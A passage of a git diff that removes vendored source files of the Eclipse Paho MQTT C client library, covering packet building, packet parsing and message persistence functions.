-void* MQTTPacket_publish(unsigned char aHeader, char* data, size_t datalen);
-void MQTTPacket_freePublish(Publish* pack);
-int MQTTPacket_send_publish(Publish* pack, int dup, int qos, int retained, networkHandles* net, const char* clientID);
-int MQTTPacket_send_puback(int msgid, networkHandles* net, const char* clientID);
-void* MQTTPacket_ack(unsigned char aHeader, char* data, size_t datalen);
-
-void MQTTPacket_freeSuback(Suback* pack);
-int MQTTPacket_send_pubrec(int msgid, networkHandles* net, const char* clientID);
-int MQTTPacket_send_pubrel(int msgid, int dup, networkHandles* net, const char* clientID);
-int MQTTPacket_send_pubcomp(int msgid, networkHandles* net, const char* clientID);
-
-void MQTTPacket_free_packet(MQTTPacket* pack);
-
-#if !defined(NO_BRIDGE)
-	#include "MQTTPacketOut.h"
-#endif
-
-#endif /* MQTTPACKET_H */
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.c b/thirdparty/paho.mqtt.c/src/MQTTPacketOut.c
deleted file mode 100644
index b924085..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.c
+++ /dev/null
@@ -1,269 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - binary password and will payload
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions to deal with reading and writing of MQTT packets from and to sockets
- *
- * Some other related functions are in the MQTTPacket module
- */
-
-
-#include "MQTTPacketOut.h"
-#include "Log.h"
-#include "StackTrace.h"
-
-#include <string.h>
-#include <stdlib.h>
-
-#include "Heap.h"
-
-
-/**
- * Send an MQTT CONNECT packet down a socket.
- * @param client a structure from which to get all the required values
- * @param MQTTVersion the MQTT version to connect with
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_connect(Clients* client, int MQTTVersion)
-{
-	char *buf, *ptr;
-	Connect packet;
-	int rc = -1, len;
-
-	FUNC_ENTRY;
-	packet.header.byte = 0;
-	packet.header.bits.type = CONNECT;
-
-	len = ((MQTTVersion == 3) ? 12 : 10) + (int)strlen(client->clientID)+2;
-	if (client->will)
-		len += (int)strlen(client->will->topic)+2 + client->will->payloadlen+2;
-	if (client->username)
-		len += (int)strlen(client->username)+2;
-	if (client->password)
-		len += client->passwordlen+2;
-
-	ptr = buf = malloc(len);
-	if (MQTTVersion == 3)
-	{
-		writeUTF(&ptr, "MQIsdp");
-		writeChar(&ptr, (char)3);
-	}
-	else if (MQTTVersion == 4)
-	{
-		writeUTF(&ptr, "MQTT");
-		writeChar(&ptr, (char)4);
-	}
-	else
-		goto exit;
-
-	packet.flags.all = 0;
-	packet.flags.bits.cleanstart = client->cleansession;
-	packet.flags.bits.will = (client->will) ? 1 : 0;
-	if (packet.flags.bits.will)
-	{
-		packet.flags.bits.willQoS = client->will->qos;
-		packet.flags.bits.willRetain = client->will->retained;
-	}
-
-	if (client->username)
-		packet.flags.bits.username = 1;
-	if (client->password)
-		packet.flags.bits.password = 1;
-
-	writeChar(&ptr, packet.flags.all);
-	writeInt(&ptr, client->keepAliveInterval);
-	writeUTF(&ptr, client->clientID);
-	if (client->will)
-	{
-		writeUTF(&ptr, client->will->topic);
-		writeData(&ptr, client->will->payload, client->will->payloadlen);
-	}
-	if (client->username)
-		writeUTF(&ptr, client->username);
-	if (client->password)
-		writeData(&ptr, client->password, client->passwordlen);
-
-	rc = MQTTPacket_send(&client->net, packet.header, buf, len, 1);
-	Log(LOG_PROTOCOL, 0, NULL, client->net.socket, client->clientID, client->cleansession, rc);
-exit:
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(buf);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create connack packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_connack(unsigned char aHeader, char* data, size_t datalen)
-{
-	Connack* pack = malloc(sizeof(Connack));
-	char* curdata = data;
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	pack->flags.all = readChar(&curdata);
-	pack->rc = readChar(&curdata);
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Send an MQTT PINGREQ packet down a socket.
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pingreq(networkHandles* net, const char* clientID)
-{
-	Header header;
-	int rc = 0;
-	size_t buflen = 0;
-
-	FUNC_ENTRY;
-	header.byte = 0;
-	header.bits.type = PINGREQ;
-	rc = MQTTPacket_send(net, header, NULL, buflen,0);
-	Log(LOG_PROTOCOL, 20, NULL, net->socket, clientID, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT subscribe packet down a socket.
- * @param topics list of topics
- * @param qoss list of corresponding QoSs
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_subscribe(List* topics, List* qoss, int msgid, int dup, networkHandles* net, const char* clientID)
-{
-	Header header;
-	char *data, *ptr;
-	int rc = -1;
-	ListElement *elem = NULL, *qosElem = NULL;
-	int datalen;
-
-	FUNC_ENTRY;
-	header.bits.type = SUBSCRIBE;
-	header.bits.dup = dup;
-	header.bits.qos = 1;
-	header.bits.retain = 0;
-
-	datalen = 2 + topics->count * 3; /* utf length + char qos == 3 */
-	while (ListNextElement(topics, &elem))
-		datalen += (int)strlen((char*)(elem->content));
-	ptr = data = malloc(datalen);
-
-	writeInt(&ptr, msgid);
-	elem = NULL;
-	while (ListNextElement(topics, &elem))
-	{
-		ListNextElement(qoss, &qosElem);
-		writeUTF(&ptr, (char*)(elem->content));
-		writeChar(&ptr, *(int*)(qosElem->content));
-	}
-	rc = MQTTPacket_send(net, header, data, datalen, 1);
-	Log(LOG_PROTOCOL, 22, NULL, net->socket, clientID, msgid, rc);
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(data);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create suback packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_suback(unsigned char aHeader, char* data, size_t datalen)
-{
-	Suback* pack = malloc(sizeof(Suback));
-	char* curdata = data;
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	pack->msgId = readInt(&curdata);
-	pack->qoss = ListInitialize();
-	while ((size_t)(curdata - data) < datalen)
-	{
-		int* newint;
-		newint = malloc(sizeof(int));
-		*newint = (int)readChar(&curdata);
-		ListAppend(pack->qoss, newint, sizeof(int));
-	}
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Send an MQTT unsubscribe packet down a socket.
- * @param topics list of topics
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_unsubscribe(List* topics, int msgid, int dup, networkHandles* net, const char* clientID)
-{
-	Header header;
-	char *data, *ptr;
-	int rc = -1;
-	ListElement *elem = NULL;
-	int datalen;
-
-	FUNC_ENTRY;
-	header.bits.type = UNSUBSCRIBE;
-	header.bits.dup = dup;
-	header.bits.qos = 1;
-	header.bits.retain = 0;
-
-	datalen = 2 + topics->count * 2; /* utf length == 2 */
-	while (ListNextElement(topics, &elem))
-		datalen += (int)strlen((char*)(elem->content));
-	ptr = data = malloc(datalen);
-
-	writeInt(&ptr, msgid);
-	elem = NULL;
-	while (ListNextElement(topics, &elem))
-		writeUTF(&ptr, (char*)(elem->content));
-	rc = MQTTPacket_send(net, header, data, datalen, 1);
-	Log(LOG_PROTOCOL, 25, NULL, net->socket, clientID, msgid, rc);
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(data);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.h b/thirdparty/paho.mqtt.c/src/MQTTPacketOut.h
deleted file mode 100644
index 700db77..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.h
+++ /dev/null
@@ -1,34 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *******************************************************************************/
-
-#if !defined(MQTTPACKETOUT_H)
-#define MQTTPACKETOUT_H
-
-#include "MQTTPacket.h"
-
-int MQTTPacket_send_connect(Clients* client, int MQTTVersion);
-void* MQTTPacket_connack(unsigned char aHeader, char* data, size_t datalen);
-
-int MQTTPacket_send_pingreq(networkHandles* net, const char* clientID);
-
-int MQTTPacket_send_subscribe(List* topics, List* qoss, int msgid, int dup, networkHandles* net, const char* clientID);
-void* MQTTPacket_suback(unsigned char aHeader, char* data, size_t datalen);
-
-int MQTTPacket_send_unsubscribe(List* topics, int msgid, int dup, networkHandles* net, const char* clientID);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistence.c b/thirdparty/paho.mqtt.c/src/MQTTPersistence.c
deleted file mode 100644
index 24efb6d..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistence.c
+++ /dev/null
@@ -1,654 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *******************************************************************************/
-
-/**
- * @file
- * \brief Functions that apply to persistence operations.
- *
- */
-
-#include <stdio.h>
-#include <string.h>
-
-#include "MQTTPersistence.h"
-#include "MQTTPersistenceDefault.h"
-#include "MQTTProtocolClient.h"
-#include "Heap.h"
-
-
-static MQTTPersistence_qEntry* MQTTPersistence_restoreQueueEntry(char* buffer, size_t buflen);
-static void MQTTPersistence_insertInSeqOrder(List* list, MQTTPersistence_qEntry* qEntry, size_t size);
-
-/**
- * Creates a ::MQTTClient_persistence structure representing a persistence implementation.
- * @param persistence the ::MQTTClient_persistence structure.
- * @param type the type of the persistence implementation. See ::MQTTClient_create.
- * @param pcontext the context for this persistence implementation. See ::MQTTClient_create.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-#include "StackTrace.h"
-
-int MQTTPersistence_create(MQTTClient_persistence** persistence, int type, void* pcontext)
-{
-	int rc = 0;
-	MQTTClient_persistence* per = NULL;
-
-	FUNC_ENTRY;
-#if !defined(NO_PERSISTENCE)
-	switch (type)
-	{
-		case MQTTCLIENT_PERSISTENCE_NONE :
-			per = NULL;
-			break;
-		case MQTTCLIENT_PERSISTENCE_DEFAULT :
-			per = malloc(sizeof(MQTTClient_persistence));
-			if ( per != NULL )
-			{
-				if ( pcontext != NULL )
-				{
-					per->context = malloc(strlen(pcontext) + 1);
-					strcpy(per->context, pcontext);
-				}
-				else
-					per->context = ".";  /* working directory */
-				/* file system functions */
-				per->popen        = pstopen;
-				per->pclose       = pstclose;
-				per->pput         = pstput;
-				per->pget         = pstget;
-				per->premove      = pstremove;
-				per->pkeys        = pstkeys;
-				per->pclear       = pstclear;
-				per->pcontainskey = pstcontainskey;
-			}
-			else
-				rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			break;
-		case MQTTCLIENT_PERSISTENCE_USER :
-			per = (MQTTClient_persistence *)pcontext;
-			if ( per == NULL || (per != NULL && (per->context == NULL || per->pclear == NULL ||
-				per->pclose == NULL || per->pcontainskey == NULL || per->pget == NULL || per->pkeys == NULL ||
-				per->popen == NULL || per->pput == NULL || per->premove == NULL)) )
-				rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			break;
-		default:
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			break;
-	}
-#endif
-
-	*persistence = per;
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Open persistent store and restore any persisted messages.
- * @param client the client as ::Clients.
- * @param serverURI the URI of the remote end.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_initialize(Clients *c, const char *serverURI)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if ( c->persistence != NULL )
-	{
-		rc = c->persistence->popen(&(c->phandle), c->clientID, serverURI, c->persistence->context);
-		if ( rc == 0 )
-			rc = MQTTPersistence_restore(c);
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Close persistent store.
- * @param client the client as ::Clients.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_close(Clients *c)
-{
-	int rc =0;
-
-	FUNC_ENTRY;
-	if (c->persistence != NULL)
-	{
-		rc = c->persistence->pclose(c->phandle);
-		c->phandle = NULL;
-#if !defined(NO_PERSISTENCE)
-		if ( c->persistence->popen == pstopen )
-			free(c->persistence);
-#endif
-		c->persistence = NULL;
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/**
- * Clears the persistent store.
- * @param client the client as ::Clients.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_clear(Clients *c)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence != NULL)
-		rc = c->persistence->pclear(c->phandle);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Restores the persisted records to the outbound and inbound message queues of the
- * client.
- * @param client the client as ::Clients.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_restore(Clients *c)
-{
-	int rc = 0;
-	char **msgkeys = NULL,
-		 *buffer = NULL;
-	int nkeys, buflen;
-	int i = 0;
-	int msgs_sent = 0;
-	int msgs_rcvd = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence && (rc = c->persistence->pkeys(c->phandle, &msgkeys, &nkeys)) == 0)
-	{
-		while (rc == 0 && i < nkeys)
-		{
-			if (strncmp(msgkeys[i], PERSISTENCE_COMMAND_KEY, strlen(PERSISTENCE_COMMAND_KEY)) == 0)
-			{
-				;
-			}
-			else if (strncmp(msgkeys[i], PERSISTENCE_QUEUE_KEY, strlen(PERSISTENCE_QUEUE_KEY)) == 0)
-			{
-				;
-			}
-			else if ((rc = c->persistence->pget(c->phandle, msgkeys[i], &buffer, &buflen)) == 0)
-			{
-				MQTTPacket* pack = MQTTPersistence_restorePacket(buffer, buflen);
-				if ( pack != NULL )
-				{
-					if ( strstr(msgkeys[i],PERSISTENCE_PUBLISH_RECEIVED) != NULL )
-					{
-						Publish* publish = (Publish*)pack;
-						Messages* msg = NULL;
-						msg = MQTTProtocol_createMessage(publish, &msg, publish->header.bits.qos, publish->header.bits.retain);
-						msg->nextMessageType = PUBREL;
-						/* order does not matter for persisted received messages */
-						ListAppend(c->inboundMsgs, msg, msg->len);
-						publish->topic = NULL;
-						MQTTPacket_freePublish(publish);
-						msgs_rcvd++;
-					}
-					else if ( strstr(msgkeys[i],PERSISTENCE_PUBLISH_SENT) != NULL )
-					{
-						Publish* publish = (Publish*)pack;
-						Messages* msg = NULL;
-						char *key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-						sprintf(key, "%s%d", PERSISTENCE_PUBREL, publish->msgId);
-						msg = MQTTProtocol_createMessage(publish, &msg, publish->header.bits.qos, publish->header.bits.retain);
-						if ( c->persistence->pcontainskey(c->phandle, key) == 0 )
-							/* PUBLISH Qo2 and PUBREL sent */
-							msg->nextMessageType = PUBCOMP;
-						/* else: PUBLISH QoS1, or PUBLISH QoS2 and PUBREL not sent */
-						/* retry at the first opportunity */
-						msg->lastTouch = 0;
-						MQTTPersistence_insertInOrder(c->outboundMsgs, msg, msg->len);
-						publish->topic = NULL;
-						MQTTPacket_freePublish(publish);
-						free(key);
-						msgs_sent++;
-					}
-					else if ( strstr(msgkeys[i],PERSISTENCE_PUBREL) != NULL )
-					{
-						/* orphaned PUBRELs ? */
-						Pubrel* pubrel = (Pubrel*)pack;
-						char *key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-						sprintf(key, "%s%d", PERSISTENCE_PUBLISH_SENT, pubrel->msgId);
-						if ( c->persistence->pcontainskey(c->phandle, key) != 0 )
-							rc = c->persistence->premove(c->phandle, msgkeys[i]);
-						free(pubrel);
-						free(key);
-					}
-				}
-				else  /* pack == NULL -> bad persisted record */
-					rc = c->persistence->premove(c->phandle, msgkeys[i]);
-			}
-			if (buffer)
-			{
-				free(buffer);
-				buffer = NULL;
-			}
-			if (msgkeys[i])
-				free(msgkeys[i]);
-			i++;
-		}
-		if (msgkeys)
-			free(msgkeys);
-	}
-	Log(TRACE_MINIMUM, -1, "%d sent messages and %d received messages restored for client %s\n", 
-		msgs_sent, msgs_rcvd, c->clientID);
-	MQTTPersistence_wrapMsgID(c);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Returns a MQTT packet restored from persisted data.
- * @param buffer the persisted data.
- * @param buflen the number of bytes of the data buffer.
- */
-void* MQTTPersistence_restorePacket(char* buffer, size_t buflen)
-{
-	void* pack = NULL;
-	Header header;
-	int fixed_header_length = 1, ptype, remaining_length = 0;
-	char c;
-	int multiplier = 1;
-	extern pf new_packets[];
-
-	FUNC_ENTRY;
-	header.byte = buffer[0];
-	/* decode the message length according to the MQTT algorithm */
-	do
-	{
-		c = *(++buffer);
-		remaining_length += (c & 127) * multiplier;
-		multiplier *= 128;
-		fixed_header_length++;
-	} while ((c & 128) != 0);
-
-	if ( (fixed_header_length + remaining_length) == buflen )
-	{
-		ptype = header.bits.type;
-		if (ptype >= CONNECT && ptype <= DISCONNECT && new_packets[ptype] != NULL)
-			pack = (*new_packets[ptype])(header.byte, ++buffer, remaining_length);
-	}
-
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Inserts the specified message into the list, maintaining message ID order.
- * @param list the list to insert the message into.
- * @param content the message to add.
- * @param size size of the message.
- */
-void MQTTPersistence_insertInOrder(List* list, void* content, size_t size)
-{
-	ListElement* index = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while(ListNextElement(list, &current) != NULL && index == NULL)
-	{
-		if ( ((Messages*)content)->msgid < ((Messages*)current->content)->msgid )
-			index = current;
-	}
-
-	ListInsert(list, content, size, index);
-	FUNC_EXIT;
-}
-
-
-/**
- * Adds a record to the persistent store. This function must not be called for QoS0
- * messages.
- * @param socket the socket of the client.
- * @param buf0 fixed header.
- * @param buf0len length of the fixed header.
- * @param count number of buffers representing the variable header and/or the payload.
- * @param buffers the buffers representing the variable header and/or the payload.
- * @param buflens length of the buffers representing the variable header and/or the payload.
- * @param msgId the message ID.
- * @param scr 0 indicates message in the sending direction; 1 indicates message in the
- * receiving direction.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_put(int socket, char* buf0, size_t buf0len, int count,
-								 char** buffers, size_t* buflens, int htype, int msgId, int scr )
-{
-	int rc = 0;
-	extern ClientStates* bstate;
-	int nbufs, i;
-	int* lens = NULL;
-	char** bufs = NULL;
-	char *key;
-	Clients* client = NULL;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &socket, clientSocketCompare)->content);
-	if (client->persistence != NULL)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		nbufs = 1 + count;
-		lens = (int *)malloc(nbufs * sizeof(int));
-		bufs = (char **)malloc(nbufs * sizeof(char *));
-		lens[0] = (int)buf0len;
-		bufs[0] = buf0;
-		for (i = 0; i < count; i++)
-		{
-			lens[i+1] = (int)buflens[i];
-			bufs[i+1] = buffers[i];
-		}
-
-		/* key */
-		if ( scr == 0 )
-		{  /* sending */
-			if (htype == PUBLISH)   /* PUBLISH QoS1 and QoS2*/
-				sprintf(key, "%s%d", PERSISTENCE_PUBLISH_SENT, msgId);
-			if (htype == PUBREL)  /* PUBREL */
-				sprintf(key, "%s%d", PERSISTENCE_PUBREL, msgId);
-		}
-		if ( scr == 1 )  /* receiving PUBLISH QoS2 */
-			sprintf(key, "%s%d", PERSISTENCE_PUBLISH_RECEIVED, msgId);
-
-		rc = client->persistence->pput(client->phandle, key, nbufs, bufs, lens);
-
-		free(key);
-		free(lens);
-		free(bufs);
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Deletes a record from the persistent store.
- * @param client the client as ::Clients.
- * @param type the type of the persisted record: #PERSISTENCE_PUBLISH_SENT, #PERSISTENCE_PUBREL
- * or #PERSISTENCE_PUBLISH_RECEIVED.
- * @param qos the qos field of the message.
- * @param msgId the message ID.
- * @return 0 if success, #MQTTCLIENT_PERSISTENCE_ERROR otherwise.
- */
-int MQTTPersistence_remove(Clients* c, char *type, int qos, int msgId)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence != NULL)
-	{
-		char *key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		if ( (strcmp(type,PERSISTENCE_PUBLISH_SENT) == 0) && qos == 2 )
-		{
-			sprintf(key, "%s%d", PERSISTENCE_PUBLISH_SENT, msgId) ;
-			rc = c->persistence->premove(c->phandle, key);
-			sprintf(key, "%s%d", PERSISTENCE_PUBREL, msgId) ;
-			rc = c->persistence->premove(c->phandle, key);
-		}
-		else /* PERSISTENCE_PUBLISH_SENT && qos == 1 */
-		{    /* or PERSISTENCE_PUBLISH_RECEIVED */
-			sprintf(key, "%s%d", type, msgId) ;
-			rc = c->persistence->premove(c->phandle, key);
-		}
-		free(key);
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Checks whether the message IDs wrapped by looking for the largest gap between two consecutive
- * message IDs in the outboundMsgs queue.
- * @param client the client as ::Clients.
- */
-void MQTTPersistence_wrapMsgID(Clients *client)
-{
-	ListElement* wrapel = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	if ( client->outboundMsgs->count > 0 )
-	{
-		int firstMsgID = ((Messages*)client->outboundMsgs->first->content)->msgid;
-		int lastMsgID = ((Messages*)client->outboundMsgs->last->content)->msgid;
-		int gap = MAX_MSG_ID - lastMsgID + firstMsgID;
-		current = ListNextElement(client->outboundMsgs, &current);
-
-		while(ListNextElement(client->outboundMsgs, &current) != NULL)
-		{
-			int curMsgID = ((Messages*)current->content)->msgid;
-			int curPrevMsgID = ((Messages*)current->prev->content)->msgid;
-			int curgap = curMsgID - curPrevMsgID;
-			if ( curgap > gap )
-			{
-				gap = curgap;
-				wrapel = current;
-			}
-		}
-	}
-
-	if ( wrapel != NULL )
-	{
-		/* put wrapel at the beginning of the queue */
-		client->outboundMsgs->first->prev = client->outboundMsgs->last;
-		client->outboundMsgs->last->next = client->outboundMsgs->first;
-		client->outboundMsgs->first = wrapel;
-		client->outboundMsgs->last = wrapel->prev;
-		client->outboundMsgs->first->prev = NULL;
-		client->outboundMsgs->last->next = NULL;
-	}
-	FUNC_EXIT;
-}
-
-
-#if !defined(NO_PERSISTENCE)
-int MQTTPersistence_unpersistQueueEntry(Clients* client, MQTTPersistence_qEntry* qe)
-{
-	int rc = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-	
-	FUNC_ENTRY;
-	sprintf(key, "%s%u", PERSISTENCE_QUEUE_KEY, qe->seqno);
-	if ((rc = client->persistence->premove(client->phandle, key)) != 0)
-		Log(LOG_ERROR, 0, "Error %d removing qEntry from persistence", rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTPersistence_persistQueueEntry(Clients* aclient, MQTTPersistence_qEntry* qe)
-{
-	int rc = 0;
-	int nbufs = 8;
-	int bufindex = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-	int* lens = NULL;
-	void** bufs = NULL;
-		
-	FUNC_ENTRY;
-	lens = (int*)malloc(nbufs * sizeof(int));
-	bufs = malloc(nbufs * sizeof(char *));
-						
-	bufs[bufindex] = &qe->msg->payloadlen;
-	lens[bufindex++] = sizeof(qe->msg->payloadlen);
-				
-	bufs[bufindex] = qe->msg->payload;
-	lens[bufindex++] = qe->msg->payloadlen;
-		
-	bufs[bufindex] = &qe->msg->qos;
-	lens[bufindex++] = sizeof(qe->msg->qos);
-		
-	bufs[bufindex] = &qe->msg->retained;
-	lens[bufindex++] = sizeof(qe->msg->retained);
-		
-	bufs[bufindex] = &qe->msg->dup;
-	lens[bufindex++] = sizeof(qe->msg->dup);
-				
-	bufs[bufindex] = &qe->msg->msgid;
-	lens[bufindex++] = sizeof(qe->msg->msgid);
-						
-	bufs[bufindex] = qe->topicName;
-	lens[bufindex++] = (int)strlen(qe->topicName) + 1;
-				
-	bufs[bufindex] = &qe->topicLen;
-	lens[bufindex++] = sizeof(qe->topicLen);			
-		
-	sprintf(key, "%s%d", PERSISTENCE_QUEUE_KEY, ++aclient->qentry_seqno);	
-	qe->seqno = aclient->qentry_seqno;
-
-	if ((rc = aclient->persistence->pput(aclient->phandle, key, nbufs, (char**)bufs, lens)) != 0)
-		Log(LOG_ERROR, 0, "Error persisting queue entry, rc %d", rc);
-
-	free(lens);
-	free(bufs);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static MQTTPersistence_qEntry* MQTTPersistence_restoreQueueEntry(char* buffer, size_t buflen)
-{
-	MQTTPersistence_qEntry* qe = NULL;
-	char* ptr = buffer;
-	int data_size;
-	
-	FUNC_ENTRY;
-	qe = malloc(sizeof(MQTTPersistence_qEntry));
-	memset(qe, '\0', sizeof(MQTTPersistence_qEntry));
-	
-	qe->msg = malloc(sizeof(MQTTPersistence_message));
-	memset(qe->msg, '\0', sizeof(MQTTPersistence_message));
-	
-	qe->msg->payloadlen = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	data_size = qe->msg->payloadlen;
-	qe->msg->payload = malloc(data_size);
-	memcpy(qe->msg->payload, ptr, data_size);
-	ptr += data_size;
-	
-	qe->msg->qos = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	qe->msg->retained = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	qe->msg->dup = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	qe->msg->msgid = *(int*)ptr;
-	ptr += sizeof(int);
-	
-	data_size = (int)strlen(ptr) + 1;	
-	qe->topicName = malloc(data_size);
-	strcpy(qe->topicName, ptr);
-	ptr += data_size;
-	
-	qe->topicLen = *(int*)ptr;
-	ptr += sizeof(int);
-
-	FUNC_EXIT;
-	return qe;
-}
-
-
-static void MQTTPersistence_insertInSeqOrder(List* list, MQTTPersistence_qEntry* qEntry, size_t size)
-{
-	ListElement* index = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while (ListNextElement(list, &current) != NULL && index == NULL)
-	{
-		if (qEntry->seqno < ((MQTTPersistence_qEntry*)current->content)->seqno)
-			index = current;
-	}
-	ListInsert(list, qEntry, size, index);
-	FUNC_EXIT;
-}
-
-
-/**
- * Restores a queue of messages from persistence to memory
- * @param c the client as ::Clients - the client object to restore the messages to
- * @return return code, 0 if successful
- */
-int MQTTPersistence_restoreMessageQueue(Clients* c)
-{
-	int rc = 0;
-	char **msgkeys;
-	int nkeys;
-	int i = 0;
-	int entries_restored = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence && (rc = c->persistence->pkeys(c->phandle, &msgkeys, &nkeys)) == 0)
-	{
-		while (rc == 0 && i < nkeys)
-		{
-			char *buffer = NULL;
-			int buflen;
-					
-			if (strncmp(msgkeys[i], PERSISTENCE_QUEUE_KEY, strlen(PERSISTENCE_QUEUE_KEY)) != 0)
-			{
-				;
-			}
-			else if ((rc = c->persistence->pget(c->phandle, msgkeys[i], &buffer, &buflen)) == 0)
-			{
-				MQTTPersistence_qEntry* qe = MQTTPersistence_restoreQueueEntry(buffer, buflen);
-				
-				if (qe)
-				{	
-					qe->seqno = atoi(msgkeys[i]+2);
-					MQTTPersistence_insertInSeqOrder(c->messageQueue, qe, sizeof(MQTTPersistence_qEntry));
-					free(buffer);
-					c->qentry_seqno = max(c->qentry_seqno, qe->seqno);
-					entries_restored++;
-				}
